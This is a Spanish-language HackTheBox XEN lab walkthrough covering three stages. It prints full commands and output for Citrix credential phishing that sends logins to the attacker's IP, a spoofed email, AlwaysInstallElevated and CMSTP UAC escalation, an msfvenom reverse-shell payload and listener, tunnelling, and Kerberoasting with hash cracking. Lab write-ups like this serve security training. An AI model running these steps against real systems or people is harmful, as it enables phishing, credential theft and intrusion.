xchg2pwn

xchg2pwn


Entusiasta del reversing y desarrollo de exploits



HackTheBox

XEN



Breach

XEN{wh0_n33d5_2f@?}


Iniciamos la máquina escaneando los puertos de la máquina con nmap donde encontramos solo 2 puertos abiertos entre ellos un servicio http y smtp

❯ nmap 10.13.38.12
Nmap scan report for 10.13.38.12  
PORT    STATE SERVICE
25/tcp  open  smtp
80/tcp  open  http
443/tcp open  https

Al hacer un curl a el servicio http en las cabeceras de respuesta podemos ver que devuelve un codigo 301 y hace un redirect a el dominio humongousretail.com

❯ curl 10.13.38.12 -I
HTTP/1.1 301 Moved Permanently
Content-Length: 151
Content-Type: text/html; charset=UTF-8  
Location: https://humongousretail.com/
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET

Para que sepa a donde resolver cuando apuntemos al dominio lo agregaremos al archivo /etc/hosts indicando la dirección ip de la máquina victima

❯ echo "10.13.38.12 humongousretail.com" | sudo tee -a /etc/hosts  

Si ahora abrimos la web desde el dominio podemos ver una página, aunque realmente no hay nada demasiado interesante que nos de información o algo

Aplicando un poco de fuerza bruta con wfuzz en busca de directorios podemos encontrar varios que devuelven 302, entre ellos destaca el directorio /remote

❯ wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -u http://humongousretail.com/FUZZ -t 100 --hc 404  
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://humongousretail.com/FUZZ
Total requests: 26584

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000056:   301        1 L      10 W       164 Ch      "aspnet_client"
000000015:   301        1 L      10 W       154 Ch      "css"
000000002:   301        1 L      10 W       157 Ch      "images"
000000009:   301        1 L      10 W       153 Ch      "js"
000000341:   403        29 L     92 W       1233 Ch     "web-inf"
000000986:   301        1 L      10 W       157 Ch      "remote"
000001149:   403        29 L     92 W       1233 Ch     "meta-inf"
000005777:   401        29 L     100 W      1293 Ch     "jakarta"

Al abrir /remote en el navegador nos redirige a una página la cual nos permite instalar Citrix que es una aplicación que nos permite conectar a diferentes equipos

Podemos omitir este mensaje e instarlarlo despues desde la página oficial, al hacer clic en la pestaña omitir nos redirige a un panel de login de Citrix mismo

A través de smtp podemos enumerar usuarios usando un diccionario para hacer fuerza bruta, al hacerlo logramos encontrar 4 usuarios entre ellos uno llamado it

❯ smtp-user-enum -U /usr/share/seclists/Usernames/Honeypot-Captures/multiplesources-users-fabian-fingerle.de.txt -D humongousretail.com -t 10.13.38.12 -m 20 -M RCPT  
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Mode ..................... RCPT
Worker Processes ......... 20
Usernames file ........... /usr/share/seclists/Usernames/Honeypot-Captures/multiplesources-users-fabian-fingerle.de.txt
Target count ............. 1
Username count ........... 21168
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............ humongousretail.com

######## Scan started #########
10.13.38.12: legal@humongousretail.com exists
10.13.38.12: sales@humongousretail.com exists
10.13.38.12: it@humongousretail.com exists
10.13.38.12: marketing@humongousretail.com exists
######## Scan completed #########
4 results.

Podemos hacer un phishing hacia el correo de it, para ello antes descargaremos los archivos necesarios para montar una pagina de login exactamente igual

❯ tree
.
└── remote
    ├── auth
    │   ├── index.html
    │   ├── javascript.aspx
    │   ├── login.aspx
    │   ├── nocookies.aspx
    │   └── style.aspx
    ├── html
    │   ├── dummy.html
    │   └── styles
    │       └── basicStyle.css
    └── media
        ├── ButtonLeft.gif
        ├── ButtonRight.gif
        ├── CitrixLogoHeader.gif
        ├── CitrixWatermark.png
        ├── CitrixXenApp.png
        ├── Devices.gif
        ├── HDX.png
        ├── HeaderGradient.png
        ├── HorizonBgBottom.png
        ├── HorizonBgTop.png
        ├── IcaComboAll.ico
        ├── LoginPaneCenterLeftBorderGlow.gif
        ├── LoginPaneCenterRightBorderGlow.gif
        ├── LoginPaneFooterLeftBorderGlow.gif
        ├── LoginPaneFooterMidBorderGlow.gif
        ├── LoginPaneFooterRightBorderGlow.gif  
        ├── LoginPaneTopLeftBorderGlow.gif
        ├── LoginPaneTopLeftGradient.gif
        ├── LoginPaneTopMidBorderGlow.gif
        ├── LoginPaneTopRightBorderGlow.gif
        └── LoginPaneTopRightGradient.gif

6 directories, 28 files

Después de copiar el codigo fuente en auth como index.html podemos ver que los datos que recibe en el login los envia a el login.aspx por el método post

<form method="post" action="login.aspx" name="CitrixForm" autocomplete="off">  

Podemos cambiarlo para cuando visiten nuestro login los datos enviados en en login se envien por el método get a el aspx pero al aspx de nuestra dirección ip

<form method="get" action="http://10.10.14.10/login.aspx" name="CitrixForm" autocomplete="off">  

Ahora montamos la web con nuestro codigo con un servidor php, al visitar el localhost desde el navegador podemos ver que la página es exactamente igual

❯ sudo php -S 0.0.0.0:80
PHP 8.2.4 Development Server (http://0.0.0.0:80) started  

Enviamos un correo al equipo de it haciendonos pasar por el usuario sales que sabemos que existe, donde les decimos que hay un problema con el servidor Citrix, y les enviamos un enlace de nuestro login falso como contenido

❯ swaks --to sales@humongousretail.com --from it@humongousretail.com --header "Subject: Problem on the Citrix server" --body "http://10.10.14.10/remote/auth" --server humongousretail.com  
=== Trying humongousretail.com:25...
=== Connected to humongousretail.com.
<-  220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL)
 -> EHLO kali
<-  250-CITRIX
<-  250-SIZE 20480000
<-  250-AUTH LOGIN
<-  250 HELP
 -> MAIL FROM:<it@humongousretail.com>
<-  250 OK
 -> RCPT TO:<sales@humongousretail.com>
<-  250 OK
 -> DATA
<-  354 OK, send.
 -> To: sales@humongousretail.com
 -> From: it@humongousretail.com
 -> Subject: Server Problem
 -> X-Mailer: swaks v20201014.0 jetmore.org/john/code/swaks/
 ->
 -> http://10.10.14.10/
 -> .
<-  250 Queued (10.112 seconds)
 -> QUIT
<-  221 goodbye
=== Connection closed with remote host.

Después de unos segundos recibimos una petición a nuestro login donde se han intentado autenticar por lo que podemos ver la petición con credenciales

❯ sudo php -S 0.0.0.0:80
PHP 8.2.4 Development Server (http://0.0.0.0:80) started
10.13.38.12:64162 Accepted
10.13.38.12:64162 [200]: POST /remote/auth/login.aspx?LoginType=Explicit&user=jmendes&password=VivaBARC3L0N@!!!&domain=HTB.LOCAL  
10.13.38.12:64162 Closing

Después de repetir el proceso y enviar varias veces el correo a it, conseguimos ver las credenciales de 3 usuarios diferentes usando el dominio htb.local

❯ sudo php -S 0.0.0.0:80
PHP 8.2.4 Development Server (http://0.0.0.0:80) started
10.13.38.12:64162 Accepted
10.13.38.12:64162 [200]: POST /remote/auth/login.aspx?LoginType=Explicit&user=jmendes&password=VivaBARC3L0N@!!!&domain=HTB.LOCAL  
10.13.38.12:64162 Closing
10.13.38.12:64163 Accepted
10.13.38.12:64163 [200]: POST /remote/auth/login.aspx?LoginType=Explicit&user=pmorgan&password=Summer1Summer!&domain=HTB.LOCAL
10.13.38.12:64163 Closing
10.13.38.12:64169 Accepted
10.13.38.12:64169 [200]: POST /remote/auth/login.aspx?LoginType=Explicit&user=awardel&password=@M3m3ntoM0ri@&domain=HTB.LOCAL
10.13.38.12:64169 Closing

jmendes : VivaBARC3L0N@!!!  
awardel : @M3m3ntoM0ri@
pmorgan : Summer1Summer!

Con ellas podemos iniciar sesión en el login de Citrix, las credenciales que nos funcionan en este caso son las del usuario pmorgan bajo el dominio htb.local

Nos loguea y tenemos acceso a un equipo, al hacer clic en el nos descarga el archivo de configuración launch.ica para conectarnos con Citrix Receiver al equipo

Al abrir el archivo ica iniciamos sesión en un equipo Windows 7 de una arquitectura x64 el cual que se identifica con el nombre vdesktop3 bajo el dominio htb.local

Si nos vamos a Desktop en el explorador de archivos podemos encontrar la flag


Deploy

XEN{7ru573d_1n574ll3r5}


Estamos algo limitados ya que de primeras no podemos ejecutar una cmd, sin embargo podemos crear un archivo con el notepad que contenga cmd.exe

Este archivo lo guardaremos en el escritorio bajo el nombre cmd con la extensión bat para dar decirle que queremos que se ejecute su contenido que es cmd.exe

Guardamos y al ejecutarlo desde el explorador de archivos nos lanza una cmd como el usuario pmorgan, ahora tenemos una consola donde ejecutar comandos

Para buscar posibles formas de escañar subimos e importamos el modulo PowerUp, al correr todos los checks nos muestra que es vulnerable al AlwaysInstallElevated

PS C:\Users\pmorgan\Desktop> Import-Module .\PowerUp.ps1
PS C:\Users\pmorgan\Desktop> Invoke-AllChecks

[*] Running Invoke-AllChecks
[*] Checking if user is in a local group with administrative privileges...
[*] Checking for unquoted service paths...
[*] Checking service executable and argument permissions...
[*] Checking service permissions...
[*] Checking %PATH% for potentially hijackable .dll locations...
[*] Checking for AlwaysInstallElevated registry key...

OutputFile    :
AbuseFunction : Write-UserAddMSI

[*] Checking for Autologon credentials in registry...
[*] Checking for vulnerable registry autoruns and configs...
[*] Checking for vulnerable schtask files/configs...
[*] Checking for unattended install files...

UnattendPath : C:\Windows\Panther\Unattend.xml

[*] Checking for encrypted web.config strings...
[*] Checking for encrypted application pool and virtual directory passwords...  

PS C:\Users\pmorgan\Desktop>

También nos dice como explotarlo, al ejecutar Write-UserAddMSI nos crea un msi

PS C:\Users\pmorgan\Desktop> Write-UserAddMSI  

OutputPath                                   
----------                                   
UserAdd.msi                                  

PS C:\Users\pmorgan\Desktop>

Despues de ejecutarlo en el escritorio de pmorgan encontramos un archivo msi, al ejecutarlo nos permite crear un usuario que pertenecera al grupo Administrators

Usando runas podemos ejecutar una powershell como el usuario backdoor que hemos creado el cual deberia ser administrador local del equipo vdesktop3

C:\Users\pmorgan\Desktop>runas /user:backdoor powershell.exe
Enter the password for backdoor: password123#
Attempting to start powershell -ep bypass as user "VDESKTOP3\backdoor" ...  

C:\Users\pmorgan\Desktop>

Sin embargo aunque el usuario pertenece al grupo local Administrators al listar los privilegios que tiene, son muy limitados, igual que cualquier otro usuario

PS C:\Windows\system32> net user backdoor | Select-String Group

Local Group Memberships      *Administrators       
Global Group memberships     *None                 

PS C:\Windows\system32> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State   
============================= ==================================== ========  
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled 
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled

PS C:\Windows\system32>

Despues de buscar un poco llegamos a un articulo que nos explica como bypassear el UAC, para esto basta con subir el archivo source.cs y seguir los pasos que indica

PS C:\Users\backdoor\Desktop> Add-Type -TypeDefinition ([IO.File]::ReadAllText("$pwd\Source.cs")) -ReferencedAssemblies "System.Windows.Forms" -OutputAssembly "CMSTP-UAC-Bypass.dll"  
PS C:\Users\backdoor\Desktop> [Reflection.Assembly]::Load([IO.File]::ReadAllBytes("$pwd\CMSTP-UAC-Bypass.dll"))

GAC    Version        Location                                                 
---    -------        --------                                                 
False  v2.0.50727                                                              

PS C:\Users\backdoor\Desktop> [CMSTPBypass]::Execute("C:\Windows\System32\cmd.exe")
True
PS C:\Users\backdoor\Desktop>

Al hacerlo se abrira una nueva cmd con maximos privilegios, podemos ler la flag

C:\Windows\system32>type C:\Users\Administrator\Desktop\flag.txt  
XEN{7ru573d_1n574ll3r5}
C:\Windows\system32>

Si quisieramos facilitarlo con metasploit en una sesión de meterpreter necesitaremos antes una sesion, iniciamos creando el exe malicioso con msfvenom

❯ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.10 LPORT=443 -f exe -o shell.exe  
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: shell.exe

Ahora en el directorio donde hemos creado el exe malicioso iniciaremos un servicio smb con un recurso el cual tendra de nombre kali dandole soporte a SMBv2

❯ impacket-smbserver kali . -smb2support
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0  
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

Ahora configuramos el listener en msfconsole definiendo el payload, en escucha por la interfaz tun0 y el puerto 443, y lo corremos para que quede en escucha

❯ sudo msfconsole -q
[msf](Jobs:0 Agents:0) >> use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
[msf](Jobs:0 Agents:0) exploit(multi/handler) >> set payload windows/x64/meterpreter/reverse_tcp  
payload => windows/x64/meterpreter/reverse_tcp
[msf](Jobs:0 Agents:0) exploit(multi/handler) >> set lhost tun0
lhost => tun0
[msf](Jobs:0 Agents:0) exploit(multi/handler) >> set lport 443
lport => 443
[msf](Jobs:0 Agents:0) exploit(multi/handler) >> run

[*] Started reverse TCP handler on 10.10.14.10:443

Desde la cmd que tenemos como el usuario pmorgan ejecutamos el archivo malicioso shell.exe desde el recurso smb compartido kali que hemos creado

C:\Users\pmorgan\Desktop>\\10.10.14.10\kali\shell.exe  

C:\Users\pmorgan\Desktop>

Al ejecutar el exe recibimos una conexión de la máquina en nuestro listener de metasploit y conseguimos una sesión de meterpreter como el usuario pmorgan

[msf](Jobs:0 Agents:0) exploit(multi/handler) >> run

[*] Started reverse TCP handler on 10.10.14.10:443
[*] Sending stage (200774 bytes) to 10.13.38.15
[*] Meterpreter session 1 opened (10.10.14.10:443 -> 10.13.38.15:54595)  

(Meterpreter 1)(C:\Users\pmorgan\Desktop) > getuid
Server username: HTB\pmorgan
(Meterpreter 1)(C:\Users\pmorgan\Desktop) >

Podemos enviar la sesión de fondo y usar un modulo de reconocimiento para probar posibles exploits a los cuales podria ser vulnerable la máquina

(Meterpreter 1)(C:\Users\pmorgan\Desktop) > background
[*] Backgrounding session 1...
[msf](Jobs:0 Agents:1) exploit(multi/handler) >> use post/multi/recon/local_exploit_suggester
[msf](Jobs:0 Agents:1) post(multi/recon/local_exploit_suggester) >> set session 1
session => 1
[msf](Jobs:0 Agents:1) post(multi/recon/local_exploit_suggester) >> run

[*] 10.13.38.15 - Collecting local exploits for x64/windows...
[*] 10.13.38.15 - 183 exploit checks are being tried...
[+] 10.13.38.15 - exploit/windows/local/always_install_elevated: The target is vulnerable.
[+] 10.13.38.15 - exploit/windows/local/bypassuac_dotnet_profiler: The target appears to be vulnerable.
[+] 10.13.38.15 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.13.38.15 - exploit/windows/local/bypassuac_sdclt: The target appears to be vulnerable.
[+] 10.13.38.15 - exploit/windows/local/cve_2019_1458_wizardopium: The target appears to be vulnerable.
[+] 10.13.38.15 - exploit/windows/local/cve_2020_1054_drawiconex_lpe: The target appears to be vulnerable.
[+] 10.13.38.15 - exploit/windows/local/ms10_092_schelevator: The service is running, but could not be validated.  
[+] 10.13.38.15 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.13.38.15 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.13.38.15 - exploit/windows/local/ms16_014_wmi_recv_notif: The target appears to be vulnerable.
[+] 10.13.38.15 - exploit/windows/local/tokenmagic: The target appears to be vulnerable.
[*] Running check method for exploit 43 / 43
[*] Post module execution completed
[msf](Jobs:0 Agents:1) post(multi/recon/local_exploit_suggester) >>

Nos devuelve que es vulnerable a always_install_elevated, basta con ejecutar el exploit seteando la sesión y host para obtener una shell como Administrator

[msf](Jobs:0 Agents:1) post(multi/recon/local_exploit_suggester) >> use exploit/windows/local/always_install_elevated  
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
[msf](Jobs:0 Agents:1) exploit(windows/local/always_install_elevated) >> set session 1
session => 1
[msf](Jobs:0 Agents:1) exploit(windows/local/always_install_elevated) >> set lhost tun0
lhost => tun0
[msf](Jobs:0 Agents:1) exploit(windows/local/always_install_elevated) >> run
[*] Started reverse TCP handler on 10.10.14.10:4444
[*] Uploading the MSI to C:\Users\pmorgan\AppData\Local\Temp\fbwGXm.msi ...
[*] Executing MSI...
[*] Sending stage (175686 bytes) to 10.13.38.15
[+] Deleted C:\Users\pmorgan\AppData\Local\Temp\fbwGXm.msi
[*] Meterpreter session 2 opened (10.10.14.10:4444 -> 10.13.38.15:54617)

(Meterpreter 2)(C:\Windows\system32) > getuid
Server username: NT AUTHORITY\SYSTEM
(Meterpreter 2)(C:\Windows\system32) >

Con shell podemos obtener una cmd interactiva donde al entrar al escritorio del usuario Administrator podemos ver la flag asi que simplemente la leemos

(Meterpreter 2)(C:\Windows\system32) > shell
Process 2000 created.
Channel 2 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.  

C:\Windows\system32>cd C:\Users\Administrator\Desktop

C:\Users\Administrator\Desktop>dir

 Volume in drive C has no label.
 Volume Serial Number is D851-8BE0

 Directory of C:\Users\Administrator\Desktop

03/31/2019  02:46 AM    <DIR>          .
03/31/2019  02:46 AM    <DIR>          ..
03/31/2019  10:51 PM                23 flag.txt
               1 File(s)             23 bytes
               2 Dir(s)   4,173,213,696 bytes free

C:\Users\Administrator\Desktop>type flag.txt
XEN{7ru573d_1n574ll3r5}

C:\Users\Administrator\Desktop>


Ghost

XEN{l364cy_5pn5_ftw}


Antes iniciemos por hacernos una idea de la red, al hacer un simple ping a el computername DC podemos ver su dirección Ipv4 bajo la 172.16.249.*

C:\Windows\system32>ping -n 1 dc

Pinging DC.htb.local [172.16.249.200] with 32 bytes of data:  
Reply from 172.16.249.200: bytes=32 time<1ms TTL=128

Ping statistics for 172.16.249.200:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms

C:\Windows\system32>

Podemos hacer lo mismo con los demas hostnames para ver su Ipv4 como citrix

C:\Windows\system32>ping -n 1 citrix

Pinging citrix.htb.local [172.16.249.201] with 32 bytes of data:  
Reply from 172.16.249.201: bytes=32 time<1ms TTL=128

Ping statistics for 172.16.249.201:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms

C:\Windows\system32>

Después de haber enumerado todos los hosts nos queda uno, NetScaler el cual por logica podemos saber que es el .202 y devuelve 64 de ttl, puede ser Linux

C:\Windows\system32>ping -n 1 172.16.249.202

Pinging 172.16.249.202 with 32 bytes of data:
Reply from 172.16.249.202: bytes=32 time=101ms TTL=64

Ping statistics for 172.16.249.202:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),  
Approximate round trip times in milli-seconds:
    Minimum = 101ms, Maximum = 101ms, Average = 101ms

C:\Windows\system32>

Teniendo un cuenta los hostnames y direcciones nos quedaria un mapa como este

[+] Hosts activos en 172.16.249.200/24:  

    [*] 172.16.249.200: dc
    [*] 172.16.249.201: citrix
    [*] 172.16.249.202: netscaler
    [*] 172.16.249.203: vdesktop1
    [*] 172.16.249.204: vdesktop2
    [*] 172.16.249.205: vdesktop3

Para tener conexion desde nuestro equipo podemos usar ligolo-ng usando el agent para conectarnos a nuestro equipo por el puerto 11601 que nos marca el proxy

C:\Users\Administrator\Desktop> .\agent.exe -connect 10.10.14.10:11601 -ignore-cert  

En el proxy obtenemos una sesión, la indicamos e iniciamos el tunel con start

❯ ./proxy -selfcert
WARN[0000] Using automatically generated self-signed certificates (Not recommended)
INFO[0000] Listening on 0.0.0.0:11601
    __    _             __
   / /   (_)___ _____  / /___        ____  ____ _
  / /   / / __ `/ __ \/ / __ \______/ __ \/ __ `/
 / /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ /
/_____/_/\__, /\____/_/\____/     /_/ /_/\__, /
        /____/                          /____/

Made in France ♥ by @Nicocha30!

ligolo-ng »
INFO[0034] Agent joined.           name="VDESKTOP3\\backdoor@VDESKTOP3" remote="10.13.38.15:54553"  
ligolo-ng » session
? Specify a session : 1 - VDESKTOP3\backdoor@VDESKTOP3 - 10.13.38.15:54553
[Agent : VDESKTOP3\backdoor@VDESKTOP3] » start
INFO[0044] Starting tunnel to VDESKTOP3\backdoor@VDESKTOP3
[Agent : VDESKTOP3\backdoor@VDESKTOP3] »

Agregamos el segmento 172.16.249.0/24 a la interfaz de ligolo y ahora tenemos conexión con todos los equipos del dominio, podemos comprobarlo con un ping

❯ sudo ip route add 172.16.249.0/24 dev ligolo

❯ ping -c1 -w1 172.16.249.200
PING 172.16.249.200 (172.16.249.200) 56(84) bytes of data.
64 bytes from 172.16.249.200: icmp_seq=1 ttl=64 time=272 ms  

--- 172.16.249.200 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 272.401/272.401/272.401/0.000 ms

Despues de configurar ligolo obtenemos conexión con la interfaz interna, iniciamos por ver con crackmapexec las máquinas pertenecientes al dominio por smb

❯ crackmapexec smb 172.16.249.200-205
SMB         172.16.249.201  445    CITRIX           [*] Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (name:CITRIX) (domain:htb.local) (signing:False) (SMBv1:True)  
SMB         172.16.249.205  445    VDESKTOP3        [*] Windows 7 Professional 7601 Service Pack 1 x64 (name:VDESKTOP3) (domain:htb.local) (signing:False) (SMBv1:True)
SMB         172.16.249.200  445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:htb.local) (signing:True) (SMBv1:False)

Haciendo uso del modulo SharpHound.ps1 enumeraremos toda la información del dominio, esto nos creara un zip con todos los json que tienen la información

PS C:\ProgramData> Import-Module \\10.10.14.14\kali\SharpHound.ps1
PS C:\ProgramData> Invoke-BloodHound -CollectionMethod All
PS C:\ProgramData> dir

   Directory: C:\ProgramData

Mode                LastWriteTime     Length Name
----                -------------     ------ ----
d----         2/11/2019   5:30 PM            Citrix
d---s         2/24/2019   6:17 PM            Microsoft
d----         2/10/2019   7:03 PM            Package Cache
d----         2/10/2019   7:04 PM            VMware
-a---         4/25/2023   1:42 PM      15979 20230425184206_BloodHound.zip  
-a---         4/25/2023   1:29 PM    1318097 SharpHound.ps1

PS C:\ProgramData>

Pasemos a la data recolectada antes con bloodhound, listando todos los usuarios kerberoasteables del dominio encontramos vulnerable al usuario mturner

Es cierto que necesitamos credenciales para hacer el kerberoasting sin embargo al probar las que encontramos al inicio, las de pmorgan son válidas en el dominio

❯ crackmapexec smb 172.16.249.200 -u pmorgan -p Summer1Summer!
SMB         172.16.249.200  445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:htb.local) (signing:True) (SMBv1:False)  
SMB         172.16.249.200  445    DC               [+] htb.local\pmorgan:Summer1Summer!

Podemos usarlas para con GetUserSPNs de impacket hacer una petición del TGS de los usuarios kerberoasteables, al hacerlo recibimos un hash del usuario mturner

❯ impacket-GetUserSPNs htb.local/pmorgan:Summer1Summer! -dc-ip 172.16.249.200 -request 
Impacket v0.11.0 - Copyright 2023 Fortra

ServicePrincipalName                Name     MemberOf                                 PasswordLastSet             LastLogon                   Delegation 
----------------------------------  -------  ---------------------------------------  --------------------------  --------------------------  ----------
MSSQLSvc/CITRIXTEST.HTB.LOCAL:1433  mturner  CN=Deployment,OU=Groups,DC=htb,DC=local  2019-02-13 17:23:48.796612  2023-04-17 05:16:45.659598             

$krb5tgs$23$*mturner$HTB.LOCAL$htb.local/mturner*$527ee48ade01c5b1769e29d9539fbbfd$5de926ab2685f84b161ffd206dd22088511459cd08e65a6dadd8956e2fbd9df4721157e61ea1331bb51e2baa31ec83e1b7ac11b6f8e24fd9c11f03615e013d15e9d0ed2b3bf6ffc3ef8b90e37b1834e8c4e6c9cfd6a7e40b2066c76ceaecfff89489846485dc83eb5904127c32c2a662e93ef6d1b877e30ec32247d5b28d3389c67dfe3c3f3afababf669c5532ee6b47e6f18ee20a43ed1d8a4ea103b115e42f743beb1199ea1e40d816c5e14e036d4b3f36bd95820f756da527e0a725b612a4055ff9500449bdf92e235ae17522cc50c4c2d776d23c4859be7cae5d5fb6c0593989fbfb244cf505b9f4366a081847f278bee5fb543277911e2237f003974a314543dd1bc0cd2ce00345c733f9b5bb082fad58967838bb79cf64b2eded80ee41deeb5c44c939577c068fded59bd93a683e54cb35fbe03facd7ad59057bf4612143b38c505d5cd84994c9e6e026fccb12ca332ee8dac924717b6f7947c962f5f95c8acc0ade9d492efaf6afe57aa4234bcb0a5949089cde7f7043d2b69c1f924729411a9932cf5d1328964d6562d9ae1948fc3003d2d576e0f9791eb2c816bcc7c8959278113c4b9bc4a2c8711335abb8cc366dcba966e2bac0730e402f9d9a45bc87699ba6486a96c4e1d591b6a3e9a255bac4685e4389d8349c6b176b5adb7d9569a2619d89f0c7bdcd1ed7dcbf7ef64f1c307f6a561a374e48b0e254a425ab0913e51978ddee508b135e4d24a70950a7572ebd05ee7455b0fc10ae3d25312025cfc0e39654ed4e9ee7aa192f68bea94dea8a0aec408e5717dec8704b124892ffa87e58d0c15a481a1c6ff2876269c92e835a42416e09bac977819e20cc027072a62d3f28d98b06e30b5684fe56cca36bc0e46dc094871e3481d7775c88e7a576a6998f07a613b94e00b04faaff03c8c99d7c966169edb86c3bfc7d44ce9a34623fbdc398d623f90a6991730c55cc852004a22d5540c30af2275002aec8b4bc91f947dc2de0baf9317e39bbac851a02e5d23a63f0ef7a08cfd20030ee98e82d0a48971c14e80ae6d3fb32a13a9639e312ebe28d8caa3f2530763166c1fba174f57033e66c834878d34774e4af33f501807a4888051d91704a46ec4952a9984b5ab7735b83f37c88edde9c80802d69544efb6dac190dfec804c01904b613777cb21e466107e5736132ffa814c397bf8104d935038642b5a8f9d761d0b8077460799b750a7e4c9022fd95370f72a9143e4bf6c9f6d88f4e86a0aaf4b9a3e20683c010ccce325a2c4a0f3a276878ba2b65d9159b03f85796fd4e6e0bc8fe84e9ad88  

Al tirar john de primeras no logramos romper el hash usando el rockyou.txt, pero al utilizar algunas reglas logramos obtener la contraseña 4install!

❯ john -w:/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt hash --rules:d3ad0ne  
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Press 'q' or Ctrl-C to abort, almost any other key for status
4install!        (?)
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Con crackmapexec usando las credenciales de mturner podemos enumerar los recursos en los equipos, en Citrix tenemos permiso de lectura sobre Citrix$

❯ crackmapexec smb 172.16.249.200-205 -u mturner -p 4install! --shares
SMB         172.16.249.205  445    VDESKTOP3        [*] Windows 7 Professional 7601 Service Pack 1 x64 (name:VDESKTOP3) (domain:htb.local) (signing:False) (SMBv1:True)
SMB         172.16.249.201  445    CITRIX           [*] Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (name:CITRIX) (domain:htb.local) (signing:False) (SMBv1:True)  
SMB         172.16.249.200  445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:htb.local) (signing:True) (SMBv1:False)
SMB         172.16.249.205  445    VDESKTOP3        [+] htb.local\mturner:4install! 
SMB         172.16.249.201  445    CITRIX           [+] htb.local\mturner:4install! 
SMB         172.16.249.200  445    DC               [+] htb.local\mturner:4install! 
SMB         172.16.249.205  445    VDESKTOP3        [+] Enumerated shares
SMB         172.16.249.205  445    VDESKTOP3        Share           Permissions     Remark
SMB         172.16.249.205  445    VDESKTOP3        -----           -----------     ------
SMB         172.16.249.205  445    VDESKTOP3        ADMIN$                          Remote Admin
SMB         172.16.249.205  445    VDESKTOP3        C$                              Default share
SMB         172.16.249.205  445    VDESKTOP3        IPC$                            Remote IPC
SMB         172.16.249.201  445    CITRIX           [+] Enumerated shares
SMB         172.16.249.201  445    CITRIX           Share           Permissions     Remark
SMB         172.16.249.201  445    CITRIX           -----           -----------     ------
SMB         172.16.249.201  445    CITRIX           ADMIN$                          Remote Admin
SMB         172.16.249.201  445    CITRIX           C$                              Default share
SMB         172.16.249.201  445    CITRIX           Citrix$         READ            
SMB         172.16.249.201  445    CITRIX           IPC$                            Remote IPC
SMB         172.16.249.201  445    CITRIX           ISOs                            
SMB         172.16.249.201  445    CITRIX           ISOs-TEST
SMB         172.16.249.200  445    DC               [+] Enumerated shares
SMB         172.16.249.200  445    DC               Share           Permissions     Remark
SMB         172.16.249.200  445    DC               -----           -----------     ------
SMB         172.16.249.200  445    DC               ADMIN$                          Remote Admin
SMB         172.16.249.200  445    DC               C$                              Default share
SMB         172.16.249.200  445    DC               IPC$            READ            Remote IPC
SMB         172.16.249.200  445    DC               NETLOGON        READ            Logon server share 
SMB         172.16.249.200  445    DC               SYSVOL          READ            Logon server share

Con smbclient de impacket nos conectamos al recurso Citrix$ donde podemos ver varios archivos, 2 con archivos extension pdf, 1 archivo ppk y la flag.txt

❯ impacket-smbclient htb.local/mturner:'4install!'@172.16.249.201  
Impacket v0.11.0 - Copyright 2023 Fortra

Type help for list of commands
# use Citrix$
# ls
drw-rw-rw-          0  Wed May  8 18:12:51 2019 .
drw-rw-rw-          0  Wed May  8 18:12:51 2019 ..
-rw-rw-rw-     997001  Wed Feb 13 18:33:28 2019 Deploying-XenServer-5.6.pdf
-rw-rw-rw-         20  Sun Mar 31 11:25:29 2019 flag.txt
-rw-rw-rw-       1486  Wed May  8 18:22:10 2019 private.ppk
-rw-rw-rw-    1747587  Sun Mar 31 11:25:46 2019 XenServer-5-6-SHG.pdf
#

Descargamos todos los archivos usando get, ahora salimos y podemos leer la flag

# mget *
[*] Downloading Deploying-XenServer-5.6.pdf
[*] Downloading flag.txt
[*] Downloading private.ppk
[*] Downloading XenServer-5-6-SHG.pdf
# exit

